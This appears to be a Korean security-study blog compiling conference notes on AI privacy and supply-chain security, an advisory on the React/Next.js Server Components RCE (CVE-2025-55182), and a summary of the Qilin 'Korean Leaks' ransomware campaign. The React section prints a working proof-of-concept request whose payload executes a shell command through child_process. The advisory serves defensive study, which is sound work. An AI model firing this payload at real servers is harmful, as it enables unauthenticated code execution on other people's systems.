꼰머의 보안공부

1. AI시대 한국 프라이버시 보호 및 보안 생태계의 과제와 제안

- 통신(25.04 SKT), 금융(25.09 롯데카드), 게임(25.11 넷마블), 전자상거래/유통(25.11 쿠팡) 등 사회 전 분야에 걸친 유출
- AI는 과거 단순 데이터 수집/분석 도구로써 전문성이 요구되던 환경에서 누구나 접근 가능하며 다양한 영역에서 사용됨

- 주요 이슈

- 개인정보보호위원회, AI 혁신 지원 정책 방향
① 규제 불확실성 해소를 위한 사전적정성 검토제 도입
② 규제샌드박스를 통한 先허용·後제도개선 추진
③ 위원장 직속 원스톱 창구 운영
④ 가명정보 제도·운영 혁신

- 제안

2. 생성형 AI 시대의 공급망 보안 리스크

- 전통적 SW 공급망은 디지털 제품의 생성·개발·배포·생산 및 유통에 사용되는 모든 요소를 의미
> SW 또는 펌웨어 구성요소, 소프트웨어 라이브러리, 사람, 프로세스 및 기술을 포함
> Open Source의 사용이 늘어남에 따라 의존성의 복잡도 지속 증가
> 의존성 추적(SW 개발을 위해 어떤 SW를 사용했는지 모니터링) 및 SBOM(SW 구성요소 명세서) 필요

- 보안 리스크 및 추천 관행

3. 체대 보안으로서 Physical AI 보안 동향 및 발전방향

- Physical AI : 인공지능 시스템이 물리적 실체를 가지고 실제 환경과 상호작용하고 인간의 육체적인 노동을 대체
> 기존 로봇이 정해진 규칙에 따라 움직이는 것과 달리 데이터 학습을 통해 스스로 판단하여 움직일 수 있는 지능형 존재
> AI 자율성 확대는 보안/프라이버시 위협의 확장을 의미하며, AI에 내장된 보안(Guardrail)이 필요

- Physical AI는 클라우드가 아닌 온디바이스(Edge)에서 실시간으로 작동
> 프라이버시 보호, 네트워크 불안정 지역에서 안전한 운영, 로컬 보안 정책 반영 가능

4. 안전한 AI 데이터 활용을 위한 AI프라이버시 리스크 관리 방안

- 인공지능의 발전은 방대한 데이터 처리를 기초로 하고 있어 기존의 개인정보 보호원칙과 상당한 충돌 발생
> 최소수집원칙 : 서로 연관되지 아니한 테이터의 관계를 분석하여 인공지능 서비스 개발 시 최대한의 개인정보 처리 필요
> 목적제한의 원칙 : 개인정보 최초 수집 시 인공지능의 개발 목적을 미리 구체적으로 예정하기 어려움
> 이용제한의 원칙 : 적절한 인공지능을 학습시킬 수 있는 데이터가 부족하며, 인공지능 정확성 검증에도 적합하지 않음

- AI 사업자 조사 동향-사전 실태점검 결과 발표

- 생성형 인공지능(AI) 개발·활용을 위한 개인정보 처리 안내서
> 생성형 인공지능 개발 및 활용의 4단계

- 합성데이터 및 영상데이터

- 개보위 혁신 지원 원스톱 서비스
> 현장 애로사항을 보다 빠르고 안전하게 실질적인 해결 방안을 제공하는 기구
① 규제샌드박스 : 법령상 규정이 없거나 불분명한 경우 일정요건 하에 허용
② 사전적정성 : 개보위 의결을 통해 일정요건 하에 사후규제 면제
③ 이노베이션존 : 개보위가 지정한 안전한 환경에서 유연하게 가명정보 활용 가능
④ 법령적극해석 : 법 해석상 모호한 경우 개보위의 적극 해석 의결을 통해 결과 통보

5. 생성형 AI와 개인정보 유출 대응 체계

- AI 발전 과정에서 대규모 데이터 처리는 필수로, 신사업 육성과 개인 정보 침해 위험 문제가 양립
- 개인정보보호 대응 체계
> 보호 대상이 되는 개인정보 식별 및 위험도 산출
> 개인정보 Life Cycle을 설계단계부터 반영
> 개인정보 보유 최소화 및 권한 최소화, 비식별화
> 개인정보 처리업무 시스템화, 신규 서비스 보안성 심의

- 기업 : AI 자산에 대한 보안자산 등록/관리
- 정부 : 사전 보안 적정성검토 제도 등 정책 지원+가이드 (Security By Design)
- 서비스 제공사 : 보안 요구사항을 반영하여 서비스 제

보안뉴스

보안뉴스

1. React 및 Next.js

- React : 메타에서 개발한 웹사이트 화면을 만드는 데 사용되는 자바스크립트 라이브러리
- Next.js : React를 기반으로 만든 웹 프레임워크

1.1 React Server Component (RSC)

- 서버 측에서 컴포넌트를 실행하여 미리 렌더링된 마크업을 생성후, 클라이언트에게 전달되어 사용자에게 콘텐츠를 보여주는 방식

2. 취약점

- RSC Flight 프로토콜 처리 과정에서 requireModule()의 부적절한 역직렬화로 인해 인증 없이 서버에서 원격 코드 실행이 가능한 취약점 (CVSS: 10.0) [2]

> 해당 함수에서 hasOwnProperty 같은 검증 없이 클라이언트가 요청한 name을 그대로 사용하여 취약점 발생

※ NIST에서 CVE-2025-66478은 CVE-2025-55182와 동일 취약점으로 중복 처리하여 정보 삭제

> 프레임워크는 기본적으로 RSC 구현을 내장하므로, 함수를 직접적으로 명시하지 않더라도 공격에 노출됨

> 현재 중국에서 해당 취약점을 활용한 공격 테스트가 시작된 정황이 포착 되었으며, 대상 서버에 페이로드 업로드 등 5가지 단계까지 완료한 상태로 확인

※ 대상 서버에 페이로드 업로드, RSC 직렬화 취약점 유발, 외부 DNSLog로 명령 실행 성공 여부 확인, 서버 측에서 child_process 실행 가능성 검증

> 39%의 클라우드 인스턴스가 취약하며, 국내의 경우 18만 9천 대 노출된 것으로 확인

- PoC [4][5][6]

POST / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0
Next-Action: x
X-Nextjs-Request-Id: b5dce965
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
X-Nextjs-Html-Request-Id: SSTMXm7OJ_g0Ncx6jpQt9
Content-Length: 578

------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"

{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"process.mainModule.require('child_process').execSync('open -a Calculator');","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"

"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="2"

[]
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--

- 대응방안

> 벤더사 제공 업데이트 적용  [8][9][10]

> 취약점 스캐너를 활용한 취약 여부 확인 및 탐지 정책 적용 [11][12]
> 로그 점검 (RSC 관련 엔드포인트에 대한 반복적인 요청 등)

3. 참고

[1] https://nvd.nist.gov/vuln/detail/CVE-2025-55182
[2] https://www.aikido.dev/blog/react-nextjs-cve-2025-55182-rce
[3] https://en.fofa.info/result?qbase64=KGFwcD0iTkVYVC5qcyIgfHwgYXBwPSJSZWFjdC5qcyIpICYmIGNvdW50cnk9IktSIg%3D%3D
[4] https://gist.github.com/maple3142/48bc9393f45e068cf8c90ab865c0f5f3
[5] https://github.com/Malayke/Next.js-RSC-RCE-Scanner-CVE-2025-66478?tab=readme-ov-file#payload-that-can-see-command-execution-result-in-response-body-most-useful
[6] https://github.com/ejpir/CVE-2025-55182-research
[7] https://x.com/maple3142/status/1996687157789155647?s=20
[8] https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components#immediate-action-required
[9] https://nextjs.org/blog/CVE-2025-66478
[10] https://www.boho.or.kr/kr/bbs/view.do?bbsId=B0000133&pageIndex=1&nttId=71912&menuNo=205020
[11] https://github.com/assetnote/react2shell-scanner
[12] https://www.piolink.com/kr/service/Security-Analysis.php?vType=view&bbsCode=security&idx=178
[13] https://www.boannews.com/media/view.asp?idx=140766&page=1&kind=1
[14] https://www.dailysecu.com/news/articleView.html?idxno=203063
[15] https://www.dailysecu.com/news/articleView.html?idxno=203111

보안뉴스

보안뉴스

1. 개요

- Bitdefender, 한국 금융 서비스 업계를 주요 타깃으로 한 대규모 위협 “Korean Leaks 캠페인” 발표 [1]
- RaaS(Ransomware-as-a-Service) 그룹 Qilin과 북한 연계 APT 그룹 Moonstone Sleet이 협업
- MSP(Managed Service Provider, 관리 서비스 제공업체)를 초기 침입 경로로 활용해 33개의 기업이 피해(피해 업체 중 대부분이 금융서비스 업체)
- 이번 사건을 계기로 MSP를 ‘신뢰된 내부자’로 간주하는 관행을 재검토해야 한다고 강조

2. 주요내용

2.1 한국 내 비정상적인 랜섬웨어 급증

- 24.09 ~ 25.08 랜섬웨어 피해자 수는 월 평균 약 2건 수준이었으나, 25.09 피해자 건수는 25건으로 급증

> 초기 분석 결과, 25.09에 확인된 피해는 모두 Qilin 랜섬웨어에 의한 것으로 확인

※ 1건의 건설 회사를 제외한 24건 모두 금융서비스(특히 자산운용사)

2.2 Qilin & Moonstone Sleet

- Qilin 랜섬웨어 그룹은 최근 몇 달 동안 RaaS 통계에서 최상위권을 유지해온 조직
> 다크웹 전용 유출 사이트(DLS, Dedicated Leak Site)에 데이터 공개 및 데이터 몸값을 요구
> 주요 운영팀은 브랜드, 랜섬웨어 빌드, 인프라, 협상용 텍스트를 제공하고, 실제 침투·내부 장악·배포는 다른 조직이 수행하는 “긱 이코노미형 RaaS” 형태로 운영
> 수익의 80~85%는 실제 공격조직이 가져가고, 운영팀은 15~20%만 가져가는 구조

※ CIS(독립국가연합) 국가를 공격하지 않는 규칙, 러시아어 포럼 활동, 운영진 일부가 러시아어와 영어를 사용하는 등 러시아에 기반한 랜섬웨어 그룹으로 보임

- Qilin은 2025년 초 북한 연계 APT 그룹 Moonstone Sleet과 협업을 시작
> Moonstone Sleet는 MS가 2024년 규명한 북한 위협 그룹 [3]
> 국가 연계 APT 그룹과 범죄 RaaS의 협업이라는 새로운 위협 양상을 시사

2.3 Korean Leaks 캠페인

- Korean Leaks 캠페인은 총 세 차례에 걸쳐 진행되었으며, 유출된 정보의 대부분은 25.09 공개
> 총 33곳의 피해자 중 28곳은 현재 공개 상태이며, 거의 대부분 한국 금융사, 특히 자산운용사를 공격 대상으로 삼음
> DLS에 유출된 데이터는 최소 100만 개 이상의 파일과 약 2TB에 달하며, 피해자의 메타데이터가 누락된 점을 고려하면 피해 규모는 훨씬 클 가능성 존재

2.3.1 1차 유출

- 25.09.14 10개 금융관리·자산운용사 공개
> 한국 기업들의 방대한 데이터에 접근을 확보했다는 식으로 대규모 추가 유출 예고

2.3.2 2차 유출

- 25.09.17 ~ 25.09.19 추가 피해자 9곳 공개
> 한국 금융시장과 투자자 전반을 겁주는 전략 및 규제 당국에 조사 요구

2.3.3 3차 유출

- 25.09.28 ~ 25.10.04 마지막 9곳 공개
> 2차 유출의 공격적인 요구에서 개별 피해 기업을 향한 전통적인 금전 갈취 문구로 전환

2.3.4 기타

- 25.10.22 DLS에 금융·자산운용사 프로필을 가진 새로운 피해자 1TB 이상의 데이터 공개
> ‘Korean Leaks’라는 이름은 더 이상 사용되지 않았고 게시물도 하루 만에 삭제

2.4 Root Cause

- 캠페인은 기업들이 개별적으로 노려진 것이 아닌 하나의 공통 약점을 통해 피해가 발생

2.5 결론 및 권고 사항

- 해당 캠페인을 촉발한 MSP 침해는 사이버 보안 논의에서 거의 다뤄지지 않음
> 주로 SW공급망과 트로이화된 업데이트에 초점을 맞추는 경향이 있으나 이는 아직 통계적으로 드문 형태
> 여러 기업 접근 권한을 가진 벤더·계약업체·MSP를 직접 해킹하는 방식이 훨씬 흔하고 실용적인 전략

> 하나의 통제 수단이 실패하여도 후속 통제 수단이 피해를 감지·차단·제한할 수 있도록 다층적인 방어 체계 구축이 필요

3. 참고

[1] https://www.bitdefender.com/en-us/blog/businessinsights/korean-leaks-campaign-targets-south-korean-financial-services-qilin-ransomware
[2] https://www.dailysecu.com/news/articleView.html?idxno=202815
[3] https://thehackernews.com/2024/05/microsoft-uncovers-moonstone-sleet-new.html
[4] https://koreajoongangdaily.joins.com/news/2025-09-23/business/finance/More-than-20-management-companies-may-have-suffered-data-breaches-after-a-ransomware-attack/2406352

보안뉴스